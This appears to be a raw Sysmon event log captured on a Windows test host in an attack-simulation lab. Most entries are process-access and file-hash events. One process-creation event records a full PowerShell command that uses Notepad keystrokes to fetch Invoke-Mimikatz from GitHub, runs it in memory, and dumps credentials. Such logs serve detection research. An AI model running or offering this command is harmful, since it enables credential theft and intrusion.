14:08:00.080{5ABCFE62-99F5-603E-8E07-00000000AD01}25764808C:\Windows\Explorer.EXE{5ABCFE62-E9C0-6040-494E-00000000AD01}4604C:\Windows\SYSTEM32\Notepad.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aecdf|C:\Windows\System32\SHELL32.dll+b0aa5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203379Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.080{5ABCFE62-99F5-603E-8E07-00000000AD01}25764808C:\Windows\Explorer.EXE{5ABCFE62-E9C0-6040-494E-00000000AD01}4604C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b09be|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203378Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.080{5ABCFE62-99F5-603E-8E07-00000000AD01}25764808C:\Windows\Explorer.EXE{5ABCFE62-E9C0-6040-494E-00000000AD01}4604C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b0987|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203377Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.080{5ABCFE62-99F4-603E-8807-00000000AD01}6441640C:\Windows\system32\taskhostw.exe{5ABCFE62-E9C0-6040-494E-00000000AD01}4604C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203376Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.080{5ABCFE62-99F4-603E-8807-00000000AD01}6441640C:\Windows\system32\taskhostw.exe{5ABCFE62-E9C0-6040-494E-00000000AD01}4604C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203375Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.080{5ABCFE62-99F5-603E-8E07-00000000AD01}25765240C:\Windows\Explorer.EXE{5ABCFE62-E9C0-6040-494E-00000000AD01}4604C:\Windows\SYSTEM32\Notepad.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aecdf|C:\Windows\System32\SHELL32.dll+b0aa5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203374Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.080{5ABCFE62-99F5-603E-8E07-00000000AD01}25765240C:\Windows\Explorer.EXE{5ABCFE62-E9C0-6040-494E-00000000AD01}4604C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b09be|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203373Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.080{5ABCFE62-99F5-603E-8E07-00000000AD01}25765240C:\Windows\Explorer.EXE{5ABCFE62-E9C0-6040-494E-00000000AD01}4604C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b0987|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203372Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.065{5ABCFE62-99F5-603E-8E07-00000000AD01}25765240C:\Windows\Explorer.EXE{5ABCFE62-E9C0-6040-494E-00000000AD01}4604C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203371Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.065{5ABCFE62-99F5-603E-8E07-00000000AD01}25762324C:\Windows\Explorer.EXE{5ABCFE62-E9C0-6040-494E-00000000AD01}4604C:\Windows\SYSTEM32\Notepad.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aecdf|C:\Windows\System32\SHELL32.dll+b0420|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203370Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.065{5ABCFE62-99F5-603E-8E07-00000000AD01}25762324C:\Windows\Explorer.EXE{5ABCFE62-E9C0-6040-494E-00000000AD01}4604C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+95ad0|C:\Windows\System32\SHELL32.dll+b03dc|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203369Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.065{5ABCFE62-99F5-603E-8E07-00000000AD01}25762324C:\Windows\Explorer.EXE{5ABCFE62-E9C0-6040-494E-00000000AD01}4604C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b03b0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203368Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.065{5ABCFE62-99F5-603E-8E07-00000000AD01}25762324C:\Windows\Explorer.EXE{5ABCFE62-E9C0-6040-494E-00000000AD01}4604C:\Windows\SYSTEM32\Notepad.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203367Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.065{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-E9C0-6040-494E-00000000AD01}4604C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203366Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.049{5ABCFE62-842F-603E-0F00-00000000AD01}2961448C:\Windows\system32\svchost.exe{5ABCFE62-E9C0-6040-494E-00000000AD01}4604C:\Windows\SYSTEM32\Notepad.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203365Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.049{5ABCFE62-842F-603E-0F00-00000000AD01}2961296C:\Windows\system32\svchost.exe{5ABCFE62-E9C0-6040-494E-00000000AD01}4604C:\Windows\SYSTEM32\Notepad.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002203364Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.049{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=EA4A09EDCA56D5DE1183C77D920ED202,SHA256=2BBF62ABC2B8A68A271A2D1C85933F32AE5005D52047C132A42153934A07B163,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203363Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.018{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=316D78B1F6CEDA5AF10F4CC57D925D31,SHA256=633101FDD57844675832F5B2F80DC721C7C442E4125FB0DD1D605EAA9DB5C0C8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203362Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.002{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203361Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.002{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203360Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.002{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203359Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.002{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203358Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.002{5ABCFE62-99F1-603E-7907-00000000AD01}30806064C:\Windows\system32\csrss.exe{5ABCFE62-E9C0-6040-494E-00000000AD01}4604C:\Windows\SYSTEM32\Notepad.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203357Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.002{5ABCFE62-E9BF-6040-484E-00000000AD01}60205848C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5ABCFE62-E9C0-6040-494E-00000000AD01}4604C:\Windows\SYSTEM32\Notepad.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\wshom.ocx+b37c|C:\Windows\System32\wshom.ocx+b828|C:\Windows\System32\OLEAUT32.dll+2309f|C:\Windows\System32\OLEAUT32.dll+c2e5|C:\Windows\System32\OLEAUT32.dll+c836|C:\Windows\System32\wshom.ocx+cef3|C:\Windows\System32\wshom.ocx+8f8d|UNKNOWN(00007FF816F64621) 154100x80000000000000002203356Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.011{5ABCFE62-E9C0-6040-494E-00000000AD01}4604C:\Windows\System32\notepad.exe10.0.14393.4169 (rs1_release.210107-1130)NotepadMicrosoft® Windows® Operating SystemMicrosoft CorporationNOTEPAD.EXENotepadC:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{5ABCFE62-99F3-603E-CE9A-500000000000}0x509ace2HighMD5=BA78FCF8CA9D806C6C047357E31748DE,SHA256=34A07759492E31AEC2A009505FE8DFB50242375C4308AD4657B2872F4F75A077,IMPHASH=968239BE2020F1C0DAFFDCDBD49E9C82{5ABCFE62-E9BF-6040-484E-00000000AD01}6020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr} 10341000x80000000000000002203466Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.893{5ABCFE62-99F5-603E-8E07-00000000AD01}25764808C:\Windows\Explorer.EXE{5ABCFE62-E9C0-6040-494E-00000000AD01}4604C:\Windows\SYSTEM32\Notepad.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aecdf|C:\Windows\System32\SHELL32.dll+b0aa5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203465Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.893{5ABCFE62-99F5-603E-8E07-00000000AD01}25764808C:\Windows\Explorer.EXE{5ABCFE62-E9C0-6040-494E-00000000AD01}4604C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b09be|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203464Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.893{5ABCFE62-99F5-603E-8E07-00000000AD01}25764808C:\Windows\Explorer.EXE{5ABCFE62-E9C0-6040-494E-00000000AD01}4604C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b0987|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002203463Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.877{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E7D339D5B80C764E8456CFD1A3A01970,SHA256=C1ADC63DCCBDCB9B6560F272B237AF35FD8BADE76F6F34AEE9299B53C04D23FE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203462Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.409{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF8037B8D88C8)|UNKNOWN(FFFFF5A6522B4978)|UNKNOWN(FFFFF5A6522AF625)|UNKNOWN(FFFFF5A6522B0B4A)|UNKNOWN(FFFFF5A6522FEF55)|UNKNOWN(FFFFF8037B5EFE03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000002203461Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 